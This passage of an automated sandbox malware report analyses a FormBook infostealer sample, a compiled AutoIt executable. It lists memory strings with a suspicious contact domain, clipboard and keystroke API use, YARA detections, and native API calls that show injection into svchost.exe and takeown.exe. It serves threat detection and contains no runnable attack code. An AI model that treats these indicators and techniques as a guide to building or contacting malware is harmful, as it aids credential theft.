3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 01:03:55 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330168283.0000000000E37000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd
                Source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330168283.0000000000E37000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kakeksakti43.cfd/37iq/
                Source: takeown.exe, 00000003.00000002.3330925884.0000000003AD6000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.0000000002CD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.nan21.ro
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: takeown.exe, 00000003.00000002.3330925884.000000000411E000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000331E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: takeown.exe, 00000003.00000002.3330925884.000000000411E000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000331E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: takeown.exe, 00000003.00000002.3328687494.0000000002A0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: takeown.exe, 00000003.00000003.1245230967.00000000076CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: takeown.exe, 00000003.00000003.1258038268.00000000076EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00384164
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00384164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00384164
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00383F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00383F66
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0037001C
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0039CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0039CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: This is a third-party compiled AutoIt script.0_2_00313B3A
                Source: IBbGrGi4A7.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: IBbGrGi4A7.exe, 00000000.00000000.856981789.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dc2873f2-3
                Source: IBbGrGi4A7.exe, 00000000.00000000.856981789.00000000003C4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_55f36ba6-4
                Source: IBbGrGi4A7.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7bb4fb55-4
                Source: IBbGrGi4A7.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e5a12019-d
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C253 NtClose,1_2_0042C253
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B60 NtClose,LdrInitializeThunk,1_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,1_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774340 NtSetContextThread,1_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774650 NtSuspendThread,1_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BF0 NtAllocateVirtualMemory,1_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BE0 NtQueryValueKey,1_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BA0 NtEnumerateValueKey,1_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B80 NtQueryInformationFile,1_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AF0 NtWriteFile,1_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AD0 NtReadFile,1_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AB0 NtWaitForSingleObject,1_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F60 NtCreateProcessEx,1_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F30 NtCreateSection,1_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FE0 NtCreateFile,1_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FB0 NtResumeThread,1_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FA0 NtQuerySection,1_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F90 NtProtectVirtualMemory,1_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E30 NtWriteVirtualMemory,1_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EE0 NtQueueApcThread,1_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EA0 NtAdjustPrivilegesToken,1_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E80 NtReadVirtualMemory,1_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D30 NtUnmapViewOfSection,1_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D10 NtMapViewOfSection,1_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D00 NtSetInformationFile,1_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DD0 NtDelayExecution,1_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DB0 NtEnumerateKey,1_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C70 NtFreeVirtualMemory,1_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C60 NtCreateKey,1_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C00 NtQueryInformationProcess,1_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CF0 NtOpenProcess,1_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CC0 NtQueryVirtualMemory,1_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CA0 NtQueryInformationToken,1_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773010 NtOpenDirectoryObject,1_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773090 NtSetValueKey,1_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037739B0 NtGetContextThread,1_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D70 NtOpenThread,1_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D10 NtOpenProcessToken,1_2_03773D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA4340 NtSetContextThread,LdrInitializeThunk,3_2_02FA4340
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA4650 NtSuspendThread,LdrInitializeThunk,3_2_02FA4650
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2AF0 NtWriteFile,LdrInitializeThunk,3_2_02FA2AF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2AD0 NtReadFile,LdrInitializeThunk,3_2_02FA2AD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_02FA2BF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_02FA2BE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_02FA2BA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2B60 NtClose,LdrInitializeThunk,3_2_02FA2B60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_02FA2EE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_02FA2E80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2FE0 NtCreateFile,LdrInitializeThunk,3_2_02FA2FE0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2FB0 NtResumeThread,LdrInitializeThunk,3_2_02FA2FB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2F30 NtCreateSection,LdrInitializeThunk,3_2_02FA2F30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_02FA2CA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_02FA2C70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2C60 NtCreateKey,LdrInitializeThunk,3_2_02FA2C60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_02FA2DF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2DD0 NtDelayExecution,LdrInitializeThunk,3_2_02FA2DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_02FA2D30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_02FA2D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA35C0 NtCreateMutant,LdrInitializeThunk,3_2_02FA35C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA39B0 NtGetContextThread,LdrInitializeThunk,3_2_02FA39B0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2AB0 NtWaitForSingleObject,3_2_02FA2AB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2B80 NtQueryInformationFile,3_2_02FA2B80
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2EA0 NtAdjustPrivilegesToken,3_2_02FA2EA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2E30 NtWriteVirtualMemory,3_2_02FA2E30
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2FA0 NtQuerySection,3_2_02FA2FA0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2F90 NtProtectVirtualMemory,3_2_02FA2F90
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2F60 NtCreateProcessEx,3_2_02FA2F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2CF0 NtOpenProcess,3_2_02FA2CF0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2CC0 NtQueryVirtualMemory,3_2_02FA2CC0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2C00 NtQueryInformationProcess,3_2_02FA2C00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2DB0 NtEnumerateKey,3_2_02FA2DB0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA2D00 NtSetInformationFile,3_2_02FA2D00
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA3090 NtSetValueKey,3_2_02FA3090
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA3010 NtOpenDirectoryObject,3_2_02FA3010
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA3D70 NtOpenThread,3_2_02FA3D70
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02FA3D10 NtOpenProcessToken,3_2_02FA3D10
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02598F60 NtCreateFile,3_2_02598F60
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_02599260 NtClose,3_2_02599260
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025993C0 NtAllocateVirtualMemory,3_2_025993C0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025990D0 NtReadFile,3_2_025990D0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 3_2_025991C0 NtDeleteFile,3_2_025991C0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0037A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0037A1EF
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00368310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00368310
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003751BD
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0031E6A00_2_0031E6A0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033D9750_2_0033D975
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003321C50_2_003321C5
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003462D20_2_003462D2
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003903DA0_2_003903DA
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0034242E0_2_0034242E
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003325FA0_2_003325FA
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0036E6160_2_0036E616
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003266E10_2_003266E1
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0034878F0_2_0034878F
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003288080_2_00328808
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003908570_2_00390857
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003468440_2_00346844
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003788890_2_00378889
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00350B3B0_2_00350B3B
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033CB210_2_0033CB21
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00346DB60_2_00346DB6
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00326F9E0_2_00326F9E
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003230300_2_00323030
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003331870_2_00333187
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033F1D90_2_0033F1D9
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003112870_2_00311287
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003314840_2_00331484
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003255200_2_00325520
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003376960_2_00337696
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003257600_2_00325760
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_003319780_2_00331978
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00349AB50_2_00349AB5
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0031FCE00_2_0031FCE0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0033BDA60_2_0033BDA6
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00331D900_2_00331D90
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00397DDB0_2_00397DDB
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_0031DF000_2_0031DF00
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_00323FE00_2_00323FE0
                Source: C:\Users\user\Desktop\IBbGrGi4A7.exeCode function: 0_2_031A36000_2_031A3600
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004181331_2_00418133
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040286F1_2_0040286F
